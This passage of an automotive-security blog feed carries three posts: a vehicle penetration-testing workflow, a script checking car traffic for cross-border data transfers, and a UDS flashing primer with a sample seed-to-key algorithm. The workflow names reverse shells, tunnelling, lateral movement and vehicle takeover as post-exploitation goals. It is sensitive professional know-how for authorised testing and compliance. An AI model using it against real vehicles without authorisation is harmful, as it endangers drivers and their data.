href="https://mp.weixin.qq.com/s/bVt5-d_XQsEhoODffQheOA">车联网安全基础知识之QNX命令</a></li><li><a href="https://mp.weixin.qq.com/s/pFf7hvan2Z9VOxGyuwIvmg">车联网安全基础知识之测试台架购买</a></li><li><a href="https://mp.weixin.qq.com/s/01tV6GfK8L4hNEyn0suwdw">车联网安全基础知识之USB SPH2.0线束制作</a></li><li><a href="https://mp.weixin.qq.com/s/X6mVWpj796ZZt9MFzi7U0A">车联网安全基础知识之UDS刷写前置基础知识</a></li><li><a href="https://mp.weixin.qq.com/s/hOmN2xzSidCAQ_KrTJ-3VA">车联网安全基础知识之 UDS 刷写安全</a></li><li><a href="https://mp.weixin.qq.com/s/R7h0BB7Plyvg4afFpRm-4Q">车联网安全进阶之跨境传输检测方法与脚本</a></li><li><a href="https://mp.weixin.qq.com/s/HoYENGmv8ahX4EbTlswffg">车联网安全进阶之整车渗透测试实践</a></li></ol>]]></content>
<summary type="html"><h2 id="车联网安全进阶之Trick——Android车机运行Python"><a href="#车联网安全进阶之Trick——Android车机运行Python" class="headerlink" title="车联网安全进阶之Trick——Android车机运行Py</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>车联网安全进阶之整车渗透测试实践</title>
<link href="http://delikely.github.io/2023/10/10/pentest-workflow-for-automotive/"/>
<id>http://delikely.github.io/2023/10/10/pentest-workflow-for-automotive/</id>
<published>2023-10-10T14:24:44.000Z</published>
<updated>2023-10-17T10:38:50.000Z</updated>
<content type="html"><![CDATA[<h2 id="车联网安全进阶之整车渗透测试实践"><a href="#车联网安全进阶之整车渗透测试实践" class="headerlink" title="车联网安全进阶之整车渗透测试实践"></a>车联网安全进阶之整车渗透测试实践</h2><p>渗透测试为大众所熟知,是一个老生常谈的问题,受限于有效的信息与紧迫的项目周期,做好渗透是不容易的。今天和大家分享一下智能网联汽车渗透测试实战中的认识、流程以及注意点等。</p><p>渗透测试是模拟真实攻击,旨在对其安全性进行评估。渗透测试人员使用与攻击者相同的工具、技术和流程,来查找和展示车辆的脆弱点对业务带来的影响。渗透测试能够带来以下四点收益。</p><ol><li>渗透测试有助于确定安全策略的可靠性;</li><li>识别和降低在设计、开发、应用过程中未被考虑的网络安全问题;</li><li>支持获得国内国际法律法规要求,作为支撑数据获得认证证书;</li><li>参考测试结果,为管理者提供当前企业/产品安全态势和预算优先级的定性和定量。</li></ol><p>ISO 21434 中提到的将渗透测试列为四种测试方法(功能测试、漏洞扫描、模糊测试、渗透测试)之一。但在实际的渗透测试项目之中,渗透测试有着更加宽泛的定义,漏洞扫描、模糊测试等往往是渗透测试中采用的技术手段之一。</p><h3 id="测试方法"><a href="#测试方法" class="headerlink" title="测试方法"></a>测试方法</h3><p>WP.29 R155 提到 “车辆制造商应在型式认可之前进行适当和充分的测试,以验证所实施安全措施的有效性”。“进行适当和充分的测试”——在不同的测试目的和预期结果下,采用的测试方法有所不同,这也体现被选择的不同身份角色测试人员,即内部团队和外部安全团队。内部安全团队能够采用黑白灰三种测试方法,而外部安全团队往往采用黑盒测试,部分情况可能涉及灰盒测试的一小部分。</p><ol><li><strong>白盒测试</strong> </li></ol><p>白盒测试中渗透测试人员能够获取到所有信息(源代码、二进制、各类设计文档),执行过程多为审计审查(代码审计、文档审查等)。由于资料和数据敏感程度较高,一般只有企业内部团队才有机会开展白盒测试。正如这里说的是有机会,虽然主机厂对整车系统拥有所有权,但对其中的代码并不一定拥有所有权。所以主机厂的安全部门和乙方安全公司一样开展白盒测试的机会相对较少。正因如此,部分甲方安全团队的人员有时候就会造成一种误解,渗透测试只有黑盒,做渗透测试不需要提供任何信息,一切需要渗透测试团队只能自行取得。</p><ol start="2"><li><strong>黑盒测试</strong></li></ol><p>黑盒测试中渗透测试人员无法获取车辆系统的内部资料,尝试从任何可能的内外部发起攻击,找到脆弱点。实际开展的项目大多是黑盒,主要信息需要通过逆向分析获得,如IPC/RPC通信方式、私有协议字段定义、OTA升级包分发方式等。</p><ol start="3"><li><strong>灰盒测试</strong></li></ol><p>灰盒测试中渗透测试人员对系统有一定的了解,能够获取到设计文档,如算法、系统架构、内部数据结构等。渗透测试人员可以根据详细的设计文档,构建测试用例。内部团队能够获取到的设计文档较多,而外部团队以安全设计规范文档为主。</p><h3 id="测试流程"><a href="#测试流程" class="headerlink" title="测试流程"></a>测试流程</h3><p>本文是站在乙方视角智能网联汽车渗透测试实践。整个渗透项目的流程与<a href="http://www.pentest-standard.org">渗透测试标准流程</a> 所定义大体相同,但在智能车场景下,需要做一些调整,添加一些与项目管理、信息收集相关的项。</p><p><img src="image-20231006112251653.png" alt="image-20231006112251653"></p><h4 id="1-前期沟通"><a href="#1-前期沟通" class="headerlink" title="1. 前期沟通"></a>1. <strong>前期沟通</strong></h4><p>此阶段包括首次相关相关人员会议,目的是确定渗透测试范围、测试环境、测试规则、资料收集、测试时间以及测试实施人员、测试地点、项目目标等信息。</p><ul><li>测试对象:零部件或整车 </li><li>测试环境:整车测试是否提供台架;台架有哪些零部件,环境是否完整; </li><li>测试规则: 开发版或正式版,有无调试权限;硬件是否拆解等; </li><li>测试时间:确定测试开始的时间与持续时间; </li><li>测试人员:根据项目与甲方需要确定需要人员数据与技能点; </li><li>资料收集:与客户沟通获取项目所需的资料,具体内容见 甲方需提供的资料; </li><li>项目目标:项目完成时需要达到的目标等</li></ul><h4 id="2-前期信息收集"><a href="#2-前期信息收集" class="headerlink" title="2. 前期信息收集"></a>2. <strong>前期信息收集</strong></h4><p>在上阶段中与客户沟通,收到后整理客户提供的资料,对测试对象形成初步映像。以及准备测试设备。</p><p>主机厂采用 <a href="https://delikely.eu.org/2021/07/25/Automotive-Modular-Platform/">模块化平台</a> 缩短研发周期,降低研发成本,所以新车上往往有其他已发布的车型的影子。所以无法从客户获取资料(主机厂/供应商提供的信息有限),可以发挥主观能动性,掌握主动权,利用 OSINT 搜集开发泄露资料(企标、代码27算法、DID),车友圈玩车的方法(任意应用安装)等。</p><p><img src="image-20231006171717100.png" alt="image-20231006171717100"></p><h4 id="3-测试环境适应与调整"><a href="#3-测试环境适应与调整" class="headerlink" title="3. 测试环境适应与调整"></a>3. <strong>测试环境适应与调整</strong></h4><p>此阶段开始接触被测设备,首先需要验证被测设备的是否满足测试条件。发现测试台架和测试车辆存在的问题,并联系相关负责人解决。</p><p>这一步实在实际测试中,总体来看看似不重要,但实际是影响项目推进的重要因素。理想是美好的,很多情况下客户说环境准备好了,但测试发现环境还是一团糟,由于测试车辆在SOP(Start Of Production,开始量产)之前,不免出现问题,在正式测试之前需要解决存在的问题。以下总结了几个重要的点供参考大家避坑。</p><ul><li><p>硬件问题,高低配版本</p></li><li><p>测试系统版本,刷新到完整稳定版</p></li><li><p>软件版本问题,功能不完整</p></li><li><p>网络问题,Wi-Fi不能开启、蜂窝网络无法连接</p></li><li><p>账号问题,APP未绑车</p></li><li><p>停车问题,室内与室外</p></li></ul><p><img src="image-20231006171516174.png" alt="image-20231006171516174" style="zoom:50%;" /></p><h4 id="4-信息收集"><a href="#4-信息收集" class="headerlink" title="4. 信息收集"></a>4. <strong>信息收集</strong></h4><p>在信息收集阶段要尽量收集关于被测设备软硬件的各种信息(硬件、网络、系统、应用、业务)。</p><ul><li><p>通过表格记录目标的基本信息</p></li><li><p>通过拆解分析目标使用芯片、调试接口、丝印</p></li><li><p>获取网络、系统、应用信息梳理出之间的关系并以图形方式呈现,实现团队共享</p></li><li><p>业务信息梳理,如OTA等</p><p><img src="image-20231006171422901.png" alt="image-20231006171422901"></p></li></ul><h4 id="5-威胁建模"><a href="#5-威胁建模" class="headerlink" title="5. 威胁建模"></a>5. <strong>威胁建模</strong></h4><p>根据上一阶段收集信息的对目标分析后制定测试方案,包括渗透内容、测试路径、测试重点、时间安排、分工与协作等。</p><ul><li><p>资产识别,对信息收集阶段的信息进行汇总分析,识别出需要分析处理的资产。</p></li><li><p>威胁场景识别,对资产进行初步分析,识别存在的威胁场景。</p></li><li><p>攻击路径分析,根据对目标设备的信息确定攻击路径。</p></li><li><p>制定测试方案,根据项目需求和被测目标的实际情况制定。</p></li></ul><p><img src="image-20231006171328892.png" alt="image-20231006171328892"></p><h4 id="6-漏洞挖掘"><a href="#6-漏洞挖掘" class="headerlink" title="6. 漏洞挖掘"></a>6. 漏洞挖掘</h4><p>确定出最可行的攻击通道之后, 考虑如何取得目标系统的访问控制权。 综合分析前几个阶段获取并汇总的情报信息, 找出潜在可被利用的未知安全漏洞, 并开发利用代码。同时展开动态分析,对协议、业务安全进行漏洞挖掘。</p><p><img src="image-20231006110425156.png" alt="image-20231006110425156"></p><h4 id="7-漏洞验证"><a href="#7-漏洞验证" class="headerlink" title="7. 漏洞验证"></a>7. <strong>漏洞验证</strong></h4><p>验证静态分析中将所有潜在的漏洞记录并形成利用代码,此次阶段验证这些漏洞是否能够被利用。</p><ul><li>调试PoC验证Nday</li><li>验证编码漏洞</li><li>验证服务漏洞</li><li>业务漏洞</li><li>验证其他漏洞</li></ul><p><img src="pwn.gif" alt="image-20231006110425156"></p><h4 id="8-后渗透"><a href="#8-后渗透" class="headerlink" title="8. 后渗透"></a>8. <strong>后渗透</strong></h4><p>在拿到一个模块的权限,确定是否可对目标进行内网渗透和权限维持,通过横向移动发现更多的漏洞。</p><ul><li><p>Android 反弹 Shell 可使用 Msfvenom 生成</p></li><li><p>扫描其他ECU及开放服务,发现更多的暴露点</p></li><li><p>内网穿透可使用 FRP,纵深到内网之中,建立通道方便测试</p></li><li><p>寻找固件残留,固件是重要的数据,尝试分析利用漏洞横向移动</p></li><li><p>漏洞利用,实现攻击效果,如控制车辆、窃取敏感信息等</p></li><li><p>最终形成攻击链,拍摄视频/录屏记录</p></li></ul><h4 id="9-编写报告"><a href="#9-编写报告" class="headerlink" title="9. 编写报告"></a>9. 编写报告</h4><p>通过报告,清晰、简明的向客户传达在渗透测试期间发现的漏洞,以及这些漏洞可能造成的影响。</p><ul><li><p>合规报告,汇总测试项,统计漏洞数量</p></li><li><p>漏洞挖掘报告,梳理漏洞挖掘情况,整理漏洞挖掘报告</p></li><li>过程记录报告,记录过程</li></ul><h4 id="10-回归测试"><a href="#10-回归测试" class="headerlink" title="10. 回归测试"></a>10. 回归测试</h4><p>此阶段中,在客户对本次渗透测试项目中发现的漏洞进行修复后,验证修复方案的健壮性,测试补丁能否被绕过。以及确定是否所有漏洞均进行修复,并记录结果 ,反馈给客户。</p><h3 id="思考"><a href="#思考" class="headerlink" title="思考"></a>思考</h3><p>随着整车渗透做的越多深度和广度也随之拓展,由于实际情况限制,到了一定程度之后深度和广度的进展愈发缓慢。 时间是影响最大的因素,时间有限且系统复杂,造成渗透测试中的覆盖度往往比较低。怎么才能提高效率呢,增长放缓究其原因是人的精力有限,俗话说”工欲善其事必先利其器”,当下渗透测试中缺乏专业针对性工具,需构建一系列能够提高执行效率、测试覆盖度的工具集,例如下图软件之间的调用关系图,能够可视化的了解程序之家的关联关系。与合规检测工具不一样,渗透测试工具更多的作为 Copilot 起到辅助作用,大家需要什么工具,欢迎一起交流。</p><p><img src="image-20231006114154432.png" alt="image-20231006114154432"></p><ul><li><a href="https://www.synopsys.com/zh-cn/glossary/what-is-penetration-testing.html">渗透测试及其工作原理</a></li></ul>]]></content>
<summary type="html"><h2 id="车联网安全进阶之整车渗透测试实践"><a href="#车联网安全进阶之整车渗透测试实践" class="headerlink" title="车联网安全进阶之整车渗透测试实践"></a>车联网安全进阶之整车渗透测试实践</h2><p>渗透测试为大众所熟知,是一个</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>车联网安全进阶之跨境传输检测</title>
<link href="http://delikely.github.io/2023/05/14/cross-border-check/"/>
<id>http://delikely.github.io/2023/05/14/cross-border-check/</id>
<published>2023-05-14T11:27:28.000Z</published>
<updated>2023-05-15T02:42:37.634Z</updated>
<content type="html"><![CDATA[<h2 id="车联网安全进阶之跨境传输检测"><a href="#车联网安全进阶之跨境传输检测" class="headerlink" title="车联网安全进阶之跨境传输检测"></a>车联网安全进阶之跨境传输检测</h2><p>在<strong>车联网安全基础知识</strong>系列外,新开了一个系列 <strong>车联网安全进阶</strong>,主要分享一些车联网安全的进阶的知识,包括但不限于检测脚本编写,其他的等想好了再说🙈。</p><p>5月5日发布的<a href="https://www.miit.gov.cn/api-gateway/jpaas-web-server/front/document/file-download?fileUrl=/cms_files/filemanager/1226211233/attach/20233/813c94607c204368aef325ffdd37f975.docx&fileName=1.《汽车整车信息安全技术要求》(征求意见稿).docx">《汽车整车信息安全技术要求》(征求意见稿)</a> 在10节 <code>车辆数据代码安全要求</code> 中对数据跨境传输提出了要求——车辆不得直接向境外传输数据。</p><blockquote><p>10.7 车辆不得直接向境外传输数据。</p><p>注: 用户使用浏览器访问境外网站、使用通信软件向境外传递消息、自主安装可能导致数据出境的第三方应用等不受本条款限制。</p></blockquote><p>并在<code>A.7.7 防数据直接出境测试方法</code>给出了测试方法,使用抓包工具开始抓包,然后模拟测试车辆各项预装的数据传输功能,最后分析数据包中是否包含境外IP地址。</p><blockquote><p>测试人员应按照如下测试方法,检验测试车辆是否满足正文10.7的要求:</p><p>a) 开启车辆全部移动蜂窝通信网络、WLAN通信网络,依次模拟测试车辆各项预装的数据传输功能</p><p>b) 使用网络数据抓包工具进行不少于3600秒的数据抓包,解析通信报文数据,分析目的IP地址中是否包含境外IP地址,并记录测试结果,应不包含境外IP地址。</p></blockquote><p>标准中只说了<code>应不包含境外IP地址</code>,没有给出数据包的分析方法,今天和大家分享一下我采用的检测方法和脚本。</p><h3 id="数据包抓取"><a href="#数据包抓取" class="headerlink" title="数据包抓取"></a>数据包抓取</h3><p>不同场景下使用适合的抓包工具,如使用 <code>tcpdump</code> 在TBOX中抓取移动蜂窝通信网络通信数据。</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tcpdump -i any -w tbox.pcap</span><br></pre></td></tr></table></figure><h3 id="跨境检测脚本编写"><a href="#跨境检测脚本编写" class="headerlink" title="跨境检测脚本编写"></a>跨境检测脚本编写</h3><p>使用 Python 脚本提取出数据包中的 IP,从中过滤出公网IP,然后使用公开的接口查询 IP 地址的所在地,提取出境外的IP。</p><ol><li><p>使用 scapy 提取出数据包中的公网 IP</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">packets = rdpcap(pcap)</span><br><span class="line">ip_list = []</span><br><span class="line"><span class="keyword">for</span> pkt <span class="keyword">in</span> packets:</span><br><span class="line"> <span class="keyword">if</span> IP <span class="keyword">in</span> pkt:</span><br><span class="line"> src_ip = pkt[IP].src</span><br></pre></td></tr></table></figure></li><li><p>使用 ipaddress 过滤检测是否是公网IP地址</p><p>判断IP是否为公网IP地址,过滤掉内网地址、本地换回地址、广播地址、保留地址。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 检查是否公网IP,是则返回真</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">is_public_ip</span>(<span class="params">ip</span>):</span></span><br><span class="line"> ip = ipaddress.ip_address(ip)</span><br><span class="line"> <span class="keyword">if</span> ip.is_private <span class="keyword">or</span> ip.is_loopback <span class="keyword">or</span> ip.is_multicast <span class="keyword">or</span> ip.is_reserved:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">True</span></span><br></pre></td></tr></table></figure></li><li><p>公开的接口查询 IP 地址的所在地</p><p>有很多公开的IP地址接口可以使用,这里我采用 <code>百度数据开放平台</code>提供的 API 查询 IP 的所在地。百度数据开放平台查询国内IP返回地址以省名/直辖市开头,国外的IP只显示国家。</p><p><img src="image-20230513214955112.png" alt="image-20230513214955112" style="zoom:60%;" /></p><p>根据返回地址特性,筛选出不是以省名/直辖市打头的地址,过滤出境外IP。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 检查IP,如果是境外IP则返回所在地址</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cross_border_addr</span>(<span class="params">ip</span>):</span></span><br><span class="line"> <span class="comment"># 百度IP信息查询API</span></span><br><span class="line"> query_api = <span class="string">"https://opendata.baidu.com/api.php?co=&resource_id=6006&oe=utf8&query="</span></span><br><span class="line"> homeland = [<span class="string">"中国"</span>,<span class="string">"北京"</span>,<span class="string">"天津"</span>,<span class="string">"河北"</span>,<span class="string">"山西"</span>,<span class="string">"内蒙古"</span>,<span class="string">"辽宁"</span>,<span class="string">"吉林"</span>,<span class="string">"黑龙江"</span>,<span class="string">"上海"</span>,<span class="string">"江苏"</span>,<span class="string">"浙江"</span>,<span class="string">"安徽"</span>,<span class="string">"福建"</span>,<span class="string">"江西"</span>,<span class="string">"山东"</span>,<span class="string">"河南"</span>,<span class="string">"湖北"</span>,<span class="string">"湖南"</span>,<span class="string">"广东"</span>,<span class="string">"广西"</span>,<span class="string">"海南"</span>,<span class="string">"重庆"</span>,<span class="string">"四川"</span>,<span class="string">"贵州"</span>,<span class="string">"云南"</span>,<span class="string">"西藏"</span>,<span class="string">"陕西"</span>,<span class="string">"甘肃"</span>,<span class="string">"青海"</span>,<span class="string">"宁夏"</span>,<span class="string">"新疆"</span>] </span><br><span class="line"> response = requests.get(query_api+ip)</span><br><span class="line"> location = json.loads(response.content.decode())[<span class="string">"data"</span>][<span class="number">0</span>][<span class="string">"location"</span>]</span><br><span class="line"> <span class="keyword">if</span> location[<span class="number">0</span>:<span class="number">2</span>] <span class="keyword">not</span> <span class="keyword">in</span> homeland:</span><br><span class="line"> <span class="keyword">return</span> location</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br></pre></td></tr></table></figure></li><li><p>将前面的代码组合起来,就是一个跨境检测的脚本</p><p>完整脚本见 <a href="https://github.com/delikely/Automotive-Security-Toolkit">https://github.com/delikely/Automotive-Security-Toolkit</a></p></li></ol><h3 id="检测脚本使用"><a href="#检测脚本使用" class="headerlink" title="检测脚本使用"></a>检测脚本使用</h3><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">E:\Code\Automotive> python <span class="string">'cross-border checker.py'</span> -h</span><br><span class="line">usage: PROG [options]</span><br><span class="line"></span><br><span class="line">流量包跨境传输检查</span><br><span class="line"></span><br><span class="line">optional arguments:</span><br><span class="line"> -h, --<span class="built_in">help</span> show this <span class="built_in">help</span> message and <span class="built_in">exit</span></span><br><span class="line"> -f FILE, --file FILE pcap file</span><br></pre></td></tr></table></figure><p>使用 -f 选项指定需要分析的流量包。使用实例如下图,在tbox.pcap 中检测出了 4 个跨境的 IP地址。</p><p><img src="image-20230513204937877.png" alt="image-20230513204937877" style="zoom:80%;" /></p><h3 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h3><ul><li><p>测试机接入到车辆网络中,对外通信通过TBOX传输,测试机的流量可能会污染抓取的流量,影响检测的准确性。</p></li><li><p>在查询 IP 地址的所在地中,如对数据较为敏感,则可采用私有化部署(如 rapiddns 私有化部署)的数据进行查询。</p></li></ul><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul><li><a href="https://www.miit.gov.cn/api-gateway/jpaas-web-server/front/document/file-download?fileUrl=/cms_files/filemanager/1226211233/attach/20233/813c94607c204368aef325ffdd37f975.docx&fileName=1.《汽车整车信息安全技术要求》(征求意见稿).docx">《汽车整车信息安全技术要求》(征求意见稿)</a></li></ul><h3 id="系列文章"><a href="#系列文章" class="headerlink" title="系列文章"></a>系列文章</h3><ol><li><a href="https://mp.weixin.qq.com/s/FzF7ERiWZ_GGKLW4kqrH9Q">车联网安全基础知识之汽车模块化平台</a></li><li><a href="https://mp.weixin.qq.com/s/YyHRexeKgGd4RAgQ4o-jKw">车联网安全基础知识之大众集团汽车电子电气架构</a></li><li><a href="https://mp.weixin.qq.com/s/WmNT6Kbw74EluaKLZUH64g">车联网安全基础知识之TBOX主要功能</a></li><li><a href="https://mp.weixin.qq.com/s/RKU0YevKmSOJtb3NMOEy9w">车联网安全基础知识之大众J949(OCU/T-BOX)</a></li><li><a href="https://mp.weixin.qq.com/s/l1-RZ9rI09p__2hwPKSRVw">车联网安全基础知识之充电基础设施</a></li><li><a href="https://mp.weixin.qq.com/s/9KVNgiToeDsDIlR1FBMohw">车联网安全基础知识之从插线端子分析车内通信网络结构</a></li><li><a href="https://mp.weixin.qq.com/s/bVt5-d_XQsEhoODffQheOA">车联网安全基础知识之QNX命令</a></li><li><a href="https://mp.weixin.qq.com/s/pFf7hvan2Z9VOxGyuwIvmg">车联网安全基础知识之测试台架购买</a></li><li><a href="https://mp.weixin.qq.com/s/01tV6GfK8L4hNEyn0suwdw">车联网安全基础知识之USB SPH2.0线束制作</a></li><li><a href="https://mp.weixin.qq.com/s/X6mVWpj796ZZt9MFzi7U0A">车联网安全基础知识之UDS刷写前置基础知识</a></li><li><a href="https://mp.weixin.qq.com/s/hOmN2xzSidCAQ_KrTJ-3VA">车联网安全基础知识之 UDS 刷写安全</a></li></ol>]]></content>
<summary type="html"><h2 id="车联网安全进阶之跨境传输检测"><a href="#车联网安全进阶之跨境传输检测" class="headerlink" title="车联网安全进阶之跨境传输检测"></a>车联网安全进阶之跨境传输检测</h2><p>在<strong>车联网安全基础知识</st</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>车联网安全基础知识之UDS刷写</title>
<link href="http://delikely.github.io/2023/05/01/UDS-flash/"/>
<id>http://delikely.github.io/2023/05/01/UDS-flash/</id>
<published>2023-05-01T11:04:33.000Z</published>
<updated>2023-10-27T02:37:06.101Z</updated>
<content type="html"><![CDATA[<h1 id="车联网安全基础知识之UDS刷写"><a href="#车联网安全基础知识之UDS刷写" class="headerlink" title="车联网安全基础知识之UDS刷写"></a>车联网安全基础知识之UDS刷写</h1><p>有段时间没写文章了,之前计划要写的<strong>车联网安全基础知识</strong>系列要写的已经新建了<em>好多好多</em>文件了。年初到最近都忙于项目和一些生活上的事情,所以没有更新文章。最近有不少伙伴来催更,也欢迎其他小伙伴来催更和提需求。最近在给公司做SOA架构下的安全测试中,发现27算法在一些新场景下的用途以及存在的安全问题。回头翻资料的时候发现讲27服务(安全访问)的文章倒是不少,而讲述完整的UDS刷写过程的文章相当少,且很少与安全相结合。今天和大家分享一下27安全访问的安全性以及我对UDS刷写流程的一些认识。</p><h2 id="前置基础知识"><a href="#前置基础知识" class="headerlink" title="前置基础知识"></a>前置基础知识</h2><p>本文不会详细讲解UDS的基础知识,后续会出专题讲解 UDSonCAN、UDSonIP ,到时会站在安全研究的角度详细UDS协议。本文重点讲述UDS刷写流程,在了解刷写流程后可编写脚本验证MCU固件刷写的安全性,提高安全检测的效率。</p><h3 id="服务ID汇总"><a href="#服务ID汇总" class="headerlink" title="服务ID汇总"></a>服务ID汇总</h3><p>首先总体看一下刷写涉及的服务ID以及在刷写过程的用途。</p><table><thead><tr><th>诊断服务标识 Service ID</th><th>诊断服务 Diagnostic Service</th><th>在刷写过程中的用途</th><th>备注</th></tr></thead><tbody><tr><td>0x10</td><td>诊断会话控制 DiagnosticSessionControl</td><td>切换到拓展会话检查刷写条件、停止一些功能<br />切换到编程会话执行刷写</td><td></td></tr><tr><td>0x11</td><td>ECU复位 ECUReset</td><td>用于刷写完成后重启服务,使新固件生效</td><td></td></tr><tr><td>0x27</td><td>安全访问 SecurityAccess</td><td>校验刷写者身份,采用seed-key</td><td></td></tr><tr><td>0x28</td><td>通信控制 CommunicationControl</td><td>关闭和启用一般通讯报文</td><td></td></tr><tr><td>0x29</td><td>认证服务 Authentication Service</td><td>基于PKI的身份认证</td><td>27服务的增强版</td></tr><tr><td>0x31</td><td>例程控制 RoutineControl</td><td>指定特定的例程,前置条件检查、检查编程依赖等</td><td></td></tr><tr><td>0x34</td><td>请求下载 RequestDownload</td><td>设置下载的参数(起始地址、长度)</td><td></td></tr><tr><td>0x36</td><td>数据传输 TransferData</td><td>固件传输</td><td></td></tr><tr><td>0x37</td><td>请求结束传输 RequestTransferExit</td><td>终止数据传输</td><td></td></tr><tr><td>0x3E</td><td>测试设备在线 TesterPresent</td><td>用于将会话保持在当前会话中</td><td></td></tr><tr><td>0x85</td><td>控制故障码设置 ControlDTCSetting</td><td>设置启停故障码存储功能</td></tr></tbody></table><h3 id="会话"><a href="#会话" class="headerlink" title="会话"></a>会话</h3><p>诊断会话关联了一系列的诊断服务或诊断功能。只有当前激活的诊断会话支持的诊断服务才能被响应。ECU通常有两个以上的诊断会话,包括:一个默认会话(Default Session)和若干非默认会话(Non Default Session)。其中非默认会话又包括编程会话和扩展会话等。其他非默认会话由厂商自行定义。常见的ECU诊断会话定义如下:</p><table><thead><tr><th>诊断会话</th><th>会话ID</th><th>描述</th></tr></thead><tbody><tr><td>默认会话</td><td>0x01</td><td>ECU启动后默认进入此会话。只提供基本的诊断服务。</td></tr><tr><td>编程会话</td><td>0x02</td><td>ECU更新应用程序或标定数据时进入此会话。支持与程序更新相关的诊断服务。如0x34、0x36、0x37等。</td></tr><tr><td>扩展会话</td><td>0x03</td><td>除支持默认会话下的诊断服务和功能外,还支持额外的诊断服务。</td></tr><tr><td>…</td><td>…</td><td>…</td></tr></tbody></table><p>诊断会话控制服务(0x10)是用于激活控制器各种不同的会话模式 。在固件刷写中会使用0x10服务在默认会话、编程会话、拓展会话来回切换。</p><h3 id="会话保持-3E-00"><a href="#会话保持-3E-00" class="headerlink" title="会话保持(3E 00)"></a>会话保持(3E 00)</h3><p>此服务用于向单(或多)个服务端指示客户端仍然与车辆连接,并且维持先前已激活的某些诊断服务和/或通信将保持活动状态。此服务用于将一个或多个服务端保留在默认会话之外的诊断会话中,通过周期性的发送 3E 实现 。</p><p>整个刷写过程中, 刷写工具要周期性的发送链路保持请求, ECU 不需要响应请求信息。如果没有开启会话保持,几秒后ECU就会切回默认会话。</p><ul><li>刷写前需要保持在拓展会话下。</li><li>刷写中需要保持在编程模式下。</li></ul><h3 id="27-服务-安全访问认证流程"><a href="#27-服务-安全访问认证流程" class="headerlink" title="27 服务-安全访问认证流程"></a>27 服务-安全访问认证流程</h3><p>安全访问服务的目的是为保密和排放、安全相关的一些服务和数据提供访问权限来保护数据。2E(通过DID写入数据)、2F(通过DID进行输入输出控制)、31服务(例程控制)、34服务(请求下载)、36服务(请求上传)、37服务(数据传输)等服务需要经过身份认证。身份认证利用了种子和密钥之间<br>的关系。 服务的示例如下图所示:</p><p><img src="网络拓扑-UDS.drawio.png" alt="网络拓扑-UDS.drawio" style="zoom:50%;" /></p><ol><li>Request Seed:Tester 使用27服务,并携带需要解锁的安全等级 0X 发送给特定的 ECU。</li><li>Request Seed Reply : 对应的ECU收到之后,生成4个字节的随机数 Seed,返回给 Teseter。</li><li>Send Key: Tester 拿到Seed后,使用自定义实现的 Seed2Key 算法计算出Key,发送给ECU。Send Key 中的安全访问级别 0Y 为Request Seed的安全访问级别的值 +1。例如当请求种子为 27 01 时,发送秘钥则为 27 02(01+1)。</li><li>Send Key Reply : ECU 将收到的 Key 和 自己拿 Seed 作为输入的 Seed2Key 计算出结果进行对比,然后返回验证的结果。</li></ol><h3 id="Seed2Key-算法"><a href="#Seed2Key-算法" class="headerlink" title="Seed2Key 算法"></a>Seed2Key 算法</h3><p>安全访问中最重要的就是Seed2Key算法,算法通常是一些比较简单的移位算法,例如下列的算法。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span>SECURITYCONSTANT 0x464c4147</span></span><br><span class="line"></span><br><span class="line"><span class="function">WORD <span class="title">seedToKey</span> <span class="params">(WORD wSeed, DWORD constData)</span></span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line">trueDWORD wLastSeed ;</span><br><span class="line">trueWORD wLastKey;</span><br><span class="line">truewLastSeed= wSeed; </span><br><span class="line">truewLastSeed = (wLastSeed>><span class="number">5</span>) | (wLastSeed<<<span class="number">23</span>);</span><br><span class="line">truewLastSeed *= <span class="number">7</span>;</span><br><span class="line">truewLastSeed ^= SECURITYCONSTANT;</span><br><span class="line">truewLastKey = (WORD)wLastSeed;</span><br><span class="line">true<span class="keyword">return</span> wLastKey;</span><br><span class="line">} </span><br></pre></td></tr></table></figure><p>seed2key 接受2个输入参数 <strong>种子</strong> 和 <strong>安全常量</strong>,种子由 ECU 随机产生;安全常量内置在ECU和诊断仪中,在某种意义上来说安全常量就是密码。采用同一算法的不同用途的 ECU,通常使用不相同的安全常量。</p><h3 